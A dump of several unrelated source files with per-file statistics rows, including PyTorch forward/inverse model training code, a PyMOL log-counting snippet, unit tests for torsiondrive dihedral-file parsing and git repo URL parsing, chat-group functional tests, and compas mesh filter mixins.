        self.optimizer = optim.Adam(self.model.parameters(), lr=lr)

    def forward(self, combined_states):
        """Map concatenated (start, next) states to predicted actions."""
        actions = self.model(combined_states)
        return actions

    def train_and_validate(self, train_dl, valid_dl, num_epochs):
        """Train for num_epochs, validating after each epoch.

        Args:
            train_dl, valid_dl: iterables yielding (start_states, next_states,
                true_actions) batches of tensors.
            num_epochs: number of passes over train_dl.

        Returns:
            (loss_list, avg_loss_list, valid_loss_list): per-batch training
            losses, per-epoch mean training loss, per-epoch validation loss.
            All entries are plain Python floats (the original appended raw
            tensors to valid_loss_list; fixed with .item()).
        """
        loss_list = []
        avg_loss_list = []
        valid_loss_list = []
        logger.info("Starting with epoch 0")
        for epoch in range(num_epochs):
            losses_for_given_epoch = []
            self.model.train()
            for start_states, next_states, true_actions in train_dl:
                start_states = start_states.float()
                next_states = next_states.float()
                true_actions = true_actions.float()
                self.optimizer.zero_grad()
                combined_states = torch.cat((start_states, next_states), dim=1)
                pred_actions = self.model(combined_states)
                loss = self.criterion(pred_actions, true_actions)
                loss.backward()
                self.optimizer.step()
                losses_for_given_epoch.append(loss.item())
            self.model.eval()
            with torch.no_grad():
                valid_loss_sum = 0.0
                for start_states, next_states, true_actions in valid_dl:
                    start_states = start_states.float()
                    next_states = next_states.float()
                    true_actions = true_actions.float()
                    combined_states = torch.cat((start_states, next_states), dim=1)
                    pred_actions = self.model(combined_states)
                    # .item() keeps the accumulator a float, not a tensor
                    valid_loss_sum += self.criterion(pred_actions, true_actions).item()
            valid_loss = valid_loss_sum / len(valid_dl)
            loss_list += losses_for_given_epoch
            avg_loss_list.append(np.mean(losses_for_given_epoch))
            valid_loss_list.append(valid_loss)
            logger.info(f'Completed epoch: {epoch}/{num_epochs}')
            logger.info(f'Avg loss this epoch: {np.mean(losses_for_given_epoch)}')
            logger.info(f'Validation loss this epoch: {valid_loss}')
        return loss_list, avg_loss_list, valid_loss_list
class ForwardModel(nn.Module):
    """
    Forward model: predicts the next state given the current state and an
    action. An MLP over the concatenation [start_state, action].
    """
    def __init__(self, start_state_dims, next_state_dims, action_dims,
                 latent_var_1=64, latent_var_2=32, criterion=None, lr=4e-4, seed=0):
        """
        Args:
            start_state_dims: dimensionality of the start state.
            next_state_dims: dimensionality of the predicted next state.
            action_dims: dimensionality of the action input.
            latent_var_1, latent_var_2: hidden-layer widths.
            criterion: loss module; defaults to a fresh nn.MSELoss().
                (Was a mutable default `nn.MSELoss()` shared by all instances.)
            lr: Adam learning rate.
            seed: torch manual seed for reproducible weight initialization.
        """
        torch.manual_seed(seed)
        super(ForwardModel, self).__init__()
        self.state_dims = start_state_dims + action_dims
        self.model = nn.Sequential(
            nn.Linear(self.state_dims, latent_var_1),
            nn.ReLU(),
            nn.Linear(latent_var_1, latent_var_2),
            nn.ReLU(),
            nn.Linear(latent_var_2, next_state_dims)
        )
        # Build the default loss per instance instead of sharing one object
        # across every ForwardModel via the default-argument cell.
        self.criterion = criterion if criterion is not None else nn.MSELoss()
        self.optimizer = optim.Adam(self.model.parameters(), lr=lr)

    def forward(self, combined_input):
        """Map concatenated (start_state, action) input to predicted next states."""
        next_states = self.model(combined_input)
        return next_states

    def train_and_validate(self, train_dl, valid_dl, num_epochs):
        """Train for num_epochs, validating after each epoch.

        Args:
            train_dl, valid_dl: iterables yielding (start_states, next_states,
                true_actions) batches of tensors.
            num_epochs: number of passes over train_dl.

        Returns:
            (loss_list, avg_loss_list, valid_loss_list): per-batch training
            losses, per-epoch mean training loss, per-epoch validation loss.
            All entries are plain Python floats (the original appended raw
            tensors to valid_loss_list; fixed with .item()).
        """
        loss_list = []
        avg_loss_list = []
        valid_loss_list = []
        logger.info("Starting with epoch 0")
        for epoch in range(num_epochs):
            losses_for_given_epoch = []
            self.model.train()
            for start_states, next_states, true_actions in train_dl:
                start_states = start_states.float()
                next_states = next_states.float()
                true_actions = true_actions.float()
                self.optimizer.zero_grad()
                combined_input = torch.cat((start_states, true_actions), dim=1)
                pred_states = self.model(combined_input)
                loss = self.criterion(pred_states, next_states)
                loss.backward()
                self.optimizer.step()
                losses_for_given_epoch.append(loss.item())
            self.model.eval()
            with torch.no_grad():
                valid_loss_sum = 0.0
                for start_states, next_states, true_actions in valid_dl:
                    start_states = start_states.float()
                    next_states = next_states.float()
                    true_actions = true_actions.float()
                    combined_input = torch.cat((start_states, true_actions), dim=1)
                    pred_states = self.model(combined_input)
                    # .item() keeps the accumulator a float, not a tensor
                    valid_loss_sum += self.criterion(pred_states, next_states).item()
            valid_loss = valid_loss_sum / len(valid_dl)
            loss_list += losses_for_given_epoch
            avg_loss_list.append(np.mean(losses_for_given_epoch))
            valid_loss_list.append(valid_loss)
            logger.info(f'Completed epoch: {epoch}/{num_epochs}')
            logger.info(f'Avg loss this epoch: {np.mean(losses_for_given_epoch)}')
            logger.info(f'Validation loss this epoch: {valid_loss}')
        return loss_list, avg_loss_list, valid_loss_list
| 37.269939
| 92
| 0.614979
| 749
| 6,075
| 4.663551
| 0.145527
| 0.041225
| 0.054967
| 0.054395
| 0.865445
| 0.848841
| 0.800458
| 0.800458
| 0.780418
| 0.758088
| 0
| 0.007938
| 0.294979
| 6,075
| 163
| 93
| 37.269939
| 0.807611
| 0.024527
| 0
| 0.764228
| 0
| 0
| 0.052748
| 0.011194
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.073171
| 0
| 0.170732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea2c5580621c8f527885096a21fe9aa165b0519f
| 691
|
py
|
Python
|
Jupyter/cntlogs.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Jupyter/cntlogs.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Jupyter/cntlogs.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
# Description: Count number of *.log files in current directory.
# Source: placeHolder
# NOTE(review): this looks like a PyMOL snippet — the triple-quoted string
# below mirrors the executable cmd.do(...) calls for snippet-preview purposes
# and is never executed; confirm against the snippet-collection conventions.
"""
cmd.do('print("Count the number of log image files in current directory.");')
cmd.do('print("Usage: cntlogs");')
cmd.do('myPath = os.getcwd();')
cmd.do('logCounter = len(glob.glob1(myPath,"*.log"));')
cmd.do('print("Number of number of log image files in the current directory: ", logCounter);')
"""
# Executed part: counts *.log files in the working directory via glob.glob1
# and prints the total. Assumes `cmd`, `os`, and `glob` are provided by the
# PyMOL runtime — TODO confirm.
cmd.do('print("Count the number of log image files in current directory.");')
cmd.do('print("Usage: cntlogs");')
cmd.do('myPath = os.getcwd();')
cmd.do('logCounter = len(glob.glob1(myPath,"*.log"));')
cmd.do('print("Number of number of log image files in the current directory: ", logCounter);')
| 40.647059
| 94
| 0.68741
| 103
| 691
| 4.61165
| 0.242718
| 0.105263
| 0.126316
| 0.134737
| 0.858947
| 0.858947
| 0.858947
| 0.858947
| 0.858947
| 0.858947
| 0
| 0.003279
| 0.117221
| 691
| 16
| 95
| 43.1875
| 0.77541
| 0.551375
| 0
| 0
| 0
| 0
| 0.800664
| 0.106312
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.6
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
ea58f6e7def1d143596a49baf4ddf5dcbb67c597
| 176
|
py
|
Python
|
stochastic/processes/__init__.py
|
zaczw/stochastic
|
7de6ec2f9050120adfcffeebc94bfc17ec916150
|
[
"MIT"
] | 268
|
2018-01-17T18:45:20.000Z
|
2022-03-28T06:05:30.000Z
|
stochastic/processes/__init__.py
|
zaczw/stochastic
|
7de6ec2f9050120adfcffeebc94bfc17ec916150
|
[
"MIT"
] | 42
|
2018-07-11T02:17:43.000Z
|
2021-11-27T03:27:32.000Z
|
stochastic/processes/__init__.py
|
zaczw/stochastic
|
7de6ec2f9050120adfcffeebc94bfc17ec916150
|
[
"MIT"
] | 56
|
2018-02-20T09:32:50.000Z
|
2022-02-15T15:39:37.000Z
|
from stochastic.processes.continuous import *
from stochastic.processes.diffusion import *
from stochastic.processes.discrete import *
from stochastic.processes.noise import *
| 35.2
| 45
| 0.840909
| 20
| 176
| 7.4
| 0.4
| 0.378378
| 0.621622
| 0.587838
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 176
| 4
| 46
| 44
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5780e1fd935276aab5a9a1d63b4738644486070d
| 6,402
|
py
|
Python
|
torsiondrive/tests/test_launch.py
|
dotsdl/torsiondrive
|
b6b9530801bdd20f2c8b52051d1ffb1453080e04
|
[
"MIT"
] | 15
|
2018-10-11T13:08:57.000Z
|
2022-03-16T03:25:20.000Z
|
torsiondrive/tests/test_launch.py
|
dotsdl/torsiondrive
|
b6b9530801bdd20f2c8b52051d1ffb1453080e04
|
[
"MIT"
] | 47
|
2018-08-28T06:13:11.000Z
|
2022-01-30T20:35:15.000Z
|
torsiondrive/tests/test_launch.py
|
dotsdl/torsiondrive
|
b6b9530801bdd20f2c8b52051d1ffb1453080e04
|
[
"MIT"
] | 12
|
2019-02-01T23:38:27.000Z
|
2022-03-18T11:54:26.000Z
|
"""
Unit and regression test for the torsiondrive.launch module
"""
import pytest
from torsiondrive.launch import load_dihedralfile, create_engine
def test_load_dihedralfile_basic(tmpdir):
    """load_dihedralfile: happy paths plus malformed-row errors."""
    tmpdir.chdir()
    fn = 'dihedrals.txt'

    def write_dihedral_file(text):
        # overwrite the scratch file used by each parse attempt
        with open(fn, 'w') as handle:
            handle.write(text)

    # one dihedral: one-based file indices come back zero-based
    write_dihedral_file('''
    #i j k l
    1 2 3 4
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    assert dihedral_idxs == [[0, 1, 2, 3]]
    assert dihedral_ranges == []
    # two dihedrals
    write_dihedral_file('''
    #i j k l
    1 2 3 4
    2 3 4 5
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    assert dihedral_idxs == [[0, 1, 2, 3], [1, 2, 3, 4]]
    assert dihedral_ranges == []
    # a row with only three indices is rejected
    write_dihedral_file('''
    #i j k l
    1 2 3
    ''')
    with pytest.raises(ValueError):
        dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    # index 0 is invalid under the default one-based numbering
    write_dihedral_file('''
    #i j k l
    0 1 2 3
    ''')
    with pytest.raises(AssertionError):
        dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
def test_load_dihedralfile_0_1_numbering(tmpdir):
    """Zero-/one-based numbering options, including conflicting settings."""
    tmpdir.chdir()
    fn = 'dihedrals.txt'

    def write_dihedral_file(text):
        # overwrite the scratch file used by each parse attempt
        with open(fn, 'w') as handle:
            handle.write(text)

    # explicit zero_based_numbering keyword keeps indices as written
    write_dihedral_file('''
    #i j k l
    1 2 3 4
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn, zero_based_numbering=True)
    assert dihedral_idxs == [[1, 2, 3, 4]]
    assert dihedral_ranges == []
    # the numbering flag can also be set from inside the file
    write_dihedral_file('''
    # zero_based_numbering
    #i j k l
    1 2 3 4
    2 3 4 5
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    assert dihedral_idxs == [[1, 2, 3, 4], [2, 3, 4, 5]]
    assert dihedral_ranges == []
    # conflicting in-file flags (zero before one) are rejected
    write_dihedral_file('''
    # zero_based_numbering
    # one_based_numbering
    #i j k l
    1 2 3 4
    ''')
    with pytest.raises(ValueError):
        dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    # conflicting in-file flags (one before zero) are rejected
    write_dihedral_file('''
    # one_based_numbering
    # zero_based_numbering
    #i j k l
    1 2 3 4
    ''')
    with pytest.raises(ValueError):
        dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    # in-file one_based_numbering conflicts with the keyword override
    write_dihedral_file('''
    # one_based_numbering
    #i j k l
    1 2 3 4
    ''')
    with pytest.raises(ValueError):
        dihedral_idxs, dihedral_ranges = load_dihedralfile(fn, zero_based_numbering=True)
def test_load_dihedralfile_limited_ranges(tmpdir):
    """Per-dihedral scan ranges: parsing, defaults, and validation errors."""
    tmpdir.chdir()
    fn = 'dihedrals.txt'

    def write_dihedral_file(text):
        # overwrite the scratch file used by each parse attempt
        with open(fn, 'w') as handle:
            handle.write(text)

    # one dihedral with an explicit range
    write_dihedral_file('''
    #i j k l range_low range_hi
    1 2 3 4 -120 120
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    assert dihedral_idxs == [[0, 1, 2, 3]]
    assert dihedral_ranges == [[-120, 120]]
    # two dihedrals, each with its own range
    write_dihedral_file('''
    #i j k l range_low range_hi
    1 2 3 4 -120 120
    2 3 4 5 -90 180
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    assert dihedral_idxs == [[0, 1, 2, 3], [1, 2, 3, 4]]
    assert dihedral_ranges == [[-120, 120], [-90, 180]]
    # ranges reaching past 180 are accepted (split scans)
    write_dihedral_file('''
    #i j k l range_low range_hi
    1 2 3 4 -120 120
    2 3 4 5 120 240
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    assert dihedral_idxs == [[0, 1, 2, 3], [1, 2, 3, 4]]
    assert dihedral_ranges == [[-120, 120], [120, 240]]
    # a row without a range falls back to the default [-180, 180]
    write_dihedral_file('''
    #i j k l range_lo range_hi
    1 2 3 4 -120 120
    2 3 4 5
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    assert dihedral_idxs == [[0, 1, 2, 3], [1, 2, 3, 4]]
    assert dihedral_ranges == [[-120, 120], [-180, 180]]
    # a defaulted row may sit between explicit ones
    write_dihedral_file('''
    #i j k l range_lo range_hi
    1 2 3 4 -120 120
    2 3 4 5
    3 4 5 6 -90 150
    ''')
    dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    assert dihedral_idxs == [[0, 1, 2, 3], [1, 2, 3, 4], [2, 3, 4, 5]]
    assert dihedral_ranges == [[-120, 120], [-180, 180], [-90, 150]]
    # low >= high is rejected
    write_dihedral_file('''
    #i j k l range_lo range_hi
    1 2 3 4 -120 120
    2 3 4 5 120 120
    ''')
    with pytest.raises(AssertionError, match='range'):
        dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    # low below -180 is rejected
    write_dihedral_file('''
    #i j k l range_lo range_hi
    1 2 3 4 -200 120
    2 3 4 5 120 240
    ''')
    with pytest.raises(AssertionError, match='range'):
        dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
    # high above 360 is rejected
    write_dihedral_file('''
    #i j k l range_lo range_hi
    1 2 3 4 -120 120
    2 3 4 5 120 361
    ''')
    with pytest.raises(AssertionError, match='range'):
        dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
def test_create_engine(tmpdir):
    """OpenMM engine creation with native_opt=True must raise AssertionError."""
    with pytest.raises(AssertionError):
        create_engine('openmm', native_opt=True)
| 31.382353
| 89
| 0.615589
| 950
| 6,402
| 3.983158
| 0.094737
| 0.022199
| 0.026163
| 0.023256
| 0.838795
| 0.821353
| 0.800211
| 0.761364
| 0.752907
| 0.733615
| 0
| 0.069277
| 0.273977
| 6,402
| 203
| 90
| 31.536946
| 0.744836
| 0.129491
| 0
| 0.874286
| 0
| 0
| 0.227675
| 0
| 0
| 0
| 0
| 0
| 0.131429
| 1
| 0.022857
| false
| 0
| 0.011429
| 0
| 0.034286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57b5773ef813265c141aa42b7b3dbac7a02b2261
| 2,850
|
py
|
Python
|
test/functional/test_only_unread_groups.py
|
thenetcircle/dino-service
|
90f90e0b21ba920506dc8fc44caf69d5bed9fb6a
|
[
"MIT"
] | null | null | null |
test/functional/test_only_unread_groups.py
|
thenetcircle/dino-service
|
90f90e0b21ba920506dc8fc44caf69d5bed9fb6a
|
[
"MIT"
] | 4
|
2021-05-24T04:31:34.000Z
|
2021-06-28T03:38:56.000Z
|
test/functional/test_only_unread_groups.py
|
thenetcircle/dino-service
|
90f90e0b21ba920506dc8fc44caf69d5bed9fb6a
|
[
"MIT"
] | null | null | null |
from test.base import BaseTest
from test.functional.base_functional import BaseServerRestApi
class TestOnlyUnreadGroups(BaseServerRestApi):
    """Checks the only_unread filter on a user's group listing."""

    def _expect_group_count(self, expected, count_unread, only_unread):
        # Fetch BaseTest.USER_ID's group list and assert its length.
        groups = self.groups_for_user(
            user_id=BaseTest.USER_ID,
            count_unread=count_unread,
            only_unread=only_unread,
        )
        self.assertEqual(expected, len(groups))

    def test_only_unread(self):
        self.assert_groups_for_user(0)
        # Two outgoing conversations, one of which also has an incoming reply.
        for sender, receiver in (
            (BaseTest.USER_ID, 8888),
            (BaseTest.USER_ID, 9999),
            (9999, BaseTest.USER_ID),
        ):
            self.send_1v1_message(user_id=sender, receiver_id=receiver)
        # only_unread trims the listing to the single group with a reply.
        self._expect_group_count(2, count_unread=False, only_unread=False)
        self._expect_group_count(1, count_unread=False, only_unread=True)
        self._expect_group_count(2, count_unread=True, only_unread=False)
        self._expect_group_count(1, count_unread=True, only_unread=True)

    def test_hide_only_unread(self):
        self.assert_groups_for_user(0)
        group_id = self.send_1v1_message(user_id=BaseTest.USER_ID, receiver_id=8888)["group_id"]
        self.send_1v1_message(user_id=BaseTest.USER_ID, receiver_id=9999)
        self.send_1v1_message(user_id=8888, receiver_id=BaseTest.USER_ID)
        self._expect_group_count(1, count_unread=True, only_unread=True)
        # Hiding the group removes it from the unread-only listing.
        self.update_hide_group_for(group_id, hide=True, user_id=BaseTest.USER_ID)
        self.assert_hidden_for_user(True, group_id, user_id=BaseTest.USER_ID)
        self._expect_group_count(0, count_unread=True, only_unread=True)
        # Fetching histories un-hides the group but leaves it read.
        self.histories_for(group_id, user_id=BaseTest.USER_ID)
        self.assert_hidden_for_user(False, group_id, user_id=BaseTest.USER_ID)
        self._expect_group_count(2, count_unread=True, only_unread=False)
        self._expect_group_count(0, count_unread=True, only_unread=True)
        # A new incoming message makes the group unread again.
        self.send_1v1_message(user_id=8888, receiver_id=BaseTest.USER_ID)
        self.assert_hidden_for_user(False, group_id, user_id=BaseTest.USER_ID)
        self._expect_group_count(1, count_unread=True, only_unread=True)
        # Hiding once more removes it from the unread-only listing again.
        self.update_hide_group_for(group_id, hide=True, user_id=BaseTest.USER_ID)
        self.assert_hidden_for_user(True, group_id, user_id=BaseTest.USER_ID)
        self._expect_group_count(0, count_unread=True, only_unread=True)
| 46.721311
| 102
| 0.74386
| 430
| 2,850
| 4.57907
| 0.086047
| 0.146267
| 0.170645
| 0.195023
| 0.900965
| 0.900965
| 0.900965
| 0.89741
| 0.887252
| 0.848654
| 0
| 0.022472
| 0.156842
| 2,850
| 60
| 103
| 47.5
| 0.796921
| 0
| 0
| 0.714286
| 0
| 0
| 0.002807
| 0
| 0
| 0
| 0
| 0
| 0.380952
| 1
| 0.047619
| false
| 0
| 0.047619
| 0
| 0.119048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
17cccf2516a78bd09f3d71ef1216c220b07a26af
| 5,792
|
py
|
Python
|
src/compas/datastructures/_mixins/filters.py
|
philianeles/compas
|
129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1
|
[
"MIT"
] | null | null | null |
src/compas/datastructures/_mixins/filters.py
|
philianeles/compas
|
129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1
|
[
"MIT"
] | null | null | null |
src/compas/datastructures/_mixins/filters.py
|
philianeles/compas
|
129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
__all__ = [
'VertexFilter',
'EdgeFilter',
'FaceFilter',
]
class VertexFilter(object):

    def vertices_where(self, conditions, data=False):
        """Get vertices for which a certain condition or set of conditions is true.

        Parameters
        ----------
        conditions : dict
            A set of conditions in the form of key-value pairs.
            The keys should be attribute names. The values can be attribute
            values or ranges of attribute values in the form of min/max pairs.
        data : bool, optional
            Yield the vertices and their data attributes.
            Default is ``False``.

        Yields
        ------
        key: hashable
            The next vertex that matches the condition.
        2-tuple
            The next vertex and its attributes, if ``data=True``.

        """
        for key, attr in self.vertices(True):
            if self._vertex_matches(key, attr, conditions):
                yield (key, attr) if data else key

    def _vertex_matches(self, key, attr, conditions):
        # True when the vertex satisfies every entry in ``conditions``.
        for name, value in conditions.items():
            method = getattr(self, name, None)
            if callable(method):
                # condition name refers to a method of the datastructure
                actual = method(key)
            elif name in attr:
                actual = attr[name]
            else:
                # neither a method nor a stored attribute: cannot match
                return False
            if isinstance(value, (tuple, list)):
                # min/max pair: accept values inside the closed interval
                minval, maxval = value
                if actual < minval or actual > maxval:
                    return False
            elif value != actual:
                return False
        return True
class EdgeFilter(object):

    def edges_where(self, conditions, data=False):
        """Get edges for which a certain condition or set of conditions is true.

        Parameters
        ----------
        conditions : dict
            A set of conditions in the form of key-value pairs.
            The keys should be attribute names. The values can be attribute
            values or ranges of attribute values in the form of min/max pairs.
        data : bool, optional
            Yield the edges and their data attributes.
            Default is ``False``.

        Yields
        ------
        2-tuple
            The next edge (u, v) that matches the condition.
        3-tuple
            The next edge and its attributes, if ``data=True``.

        """
        for u, v, attr in self.edges(True):
            if self._edge_matches(u, v, attr, conditions):
                yield (u, v, attr) if data else (u, v)

    def _edge_matches(self, u, v, attr, conditions):
        # True when the edge satisfies every entry in ``conditions``.
        for name, value in conditions.items():
            method = getattr(self, name, None)
            if callable(method):
                # condition name refers to a method of the datastructure
                actual = method(u, v)
            elif name in attr:
                actual = attr[name]
            else:
                # neither a method nor a stored attribute: cannot match
                return False
            if isinstance(value, (tuple, list)):
                # min/max pair: accept values inside the closed interval
                minval, maxval = value
                if actual < minval or actual > maxval:
                    return False
            elif value != actual:
                return False
        return True
class FaceFilter(object):

    def faces_where(self, conditions, data=False):
        """Get faces for which a certain condition or set of conditions is true.

        Parameters
        ----------
        conditions : dict
            A set of conditions in the form of key-value pairs.
            The keys should be attribute names. The values can be attribute
            values or ranges of attribute values in the form of min/max pairs.
        data : bool, optional
            Yield the faces and their data attributes.
            Default is ``False``.

        Yields
        ------
        fkey: hashable
            The next face that matches the condition.
        2-tuple
            The next face and its attributes, if ``data=True``.

        """
        for fkey, attr in self.faces(True):
            if self._face_matches(fkey, attr, conditions):
                yield (fkey, attr) if data else fkey

    def _face_matches(self, fkey, attr, conditions):
        # True when the face satisfies every entry in ``conditions``.
        for name, value in conditions.items():
            method = getattr(self, name, None)
            if callable(method):
                # condition name refers to a method of the datastructure
                actual = method(fkey)
            elif name in attr:
                actual = attr[name]
            else:
                # neither a method nor a stored attribute: cannot match
                return False
            if isinstance(value, (tuple, list)):
                # min/max pair: accept values inside the closed interval
                minval, maxval = value
                if actual < minval or actual > maxval:
                    return False
            elif value != actual:
                return False
        return True
# ==============================================================================
# Main
# ==============================================================================
# No script behavior: this module only provides the filter mixin classes above.
if __name__ == "__main__":
    pass
| 29.702564
| 83
| 0.403315
| 514
| 5,792
| 4.447471
| 0.180934
| 0.064304
| 0.07874
| 0.111549
| 0.742345
| 0.730096
| 0.702975
| 0.702975
| 0.702975
| 0.702975
| 0
| 0.000353
| 0.510359
| 5,792
| 194
| 84
| 29.85567
| 0.805712
| 0.189227
| 0
| 0.756522
| 0
| 0
| 0.008963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026087
| false
| 0.008696
| 0.026087
| 0
| 0.078261
| 0.008696
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa372bcc97f282a341e70035b04fff00322e29f4
| 8,029
|
py
|
Python
|
auto_addons/tests.py
|
jmartinezespza/odoo-docker
|
288064e879c2a3910197c8b91473358e0bb25928
|
[
"MIT"
] | null | null | null |
auto_addons/tests.py
|
jmartinezespza/odoo-docker
|
288064e879c2a3910197c8b91473358e0bb25928
|
[
"MIT"
] | null | null | null |
auto_addons/tests.py
|
jmartinezespza/odoo-docker
|
288064e879c2a3910197c8b91473358e0bb25928
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2015 Elico Corp
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import unittest
from addons import *
class RepoTest(unittest.TestCase):
def test_check_is_url(self):
remote_url = 'connector'
self.repo = Repo(remote_url)
self.assertTrue(self.repo._check_is_url('https://github.com'))
self.assertTrue(self.repo._check_is_url('http://github.com'))
self.assertFalse(self.repo._check_is_url('ttps://github.com'))
def test_parse_oca_repo(self):
remote_url = 'connector'
self.repo = Repo(remote_url)
self.repo._parse_organization_repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.folder_name, 'connector')
def test_parse_organization_and_repo(self):
remote_url = 'OCA/connector'
self.repo = Repo(remote_url)
self.repo._parse_organization_repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.folder_name, 'connector')
def test_parse_url(self):
remote_url = 'https://github.com/OCA/connector'
self.repo = Repo(remote_url)
self.repo._parse_url(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
def test_path(self):
remote_url = 'connector'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_oca_repo(self):
remote_url = 'connector'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.branch, None)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_organization_and_repo(self):
    """Construction from 'org/repo' fills every derived attribute."""
    remote_url = 'OCA/connector'
    self.repo = Repo(remote_url)
    # assertEqual: assertEquals is a deprecated alias removed in Python 3.12
    self.assertEqual(self.repo.remote_url, remote_url)
    self.assertEqual(self.repo.folder_name, 'connector')
    self.assertEqual(self.repo.branch, None)
    self.assertEqual(self.repo.organization, DEFAULT_ORGANIZATION)
    self.assertEqual(self.repo.repository, 'connector')
    self.assertEqual(self.repo.git_repo_host, 'github.com')
    self.assertEqual(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_url(self):
    """Construction from a full URL fills every derived attribute."""
    remote_url = 'https://github.com/OCA/connector'
    self.repo = Repo(remote_url)
    # assertEqual: assertEquals is a deprecated alias removed in Python 3.12
    self.assertEqual(self.repo.remote_url, remote_url)
    self.assertEqual(self.repo.folder_name, 'connector')
    self.assertEqual(self.repo.branch, None)
    self.assertEqual(self.repo.organization, DEFAULT_ORGANIZATION)
    self.assertEqual(self.repo.repository, 'connector')
    self.assertEqual(self.repo.git_repo_host, 'github.com')
    self.assertEqual(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_oca_repo_and_branch(self):
    """A trailing token after the repo name is taken as the branch."""
    remote_url = 'connector 8.0'
    self.repo = Repo(remote_url)
    # assertEqual: assertEquals is a deprecated alias removed in Python 3.12
    self.assertEqual(self.repo.remote_url, remote_url)
    self.assertEqual(self.repo.folder_name, 'connector')
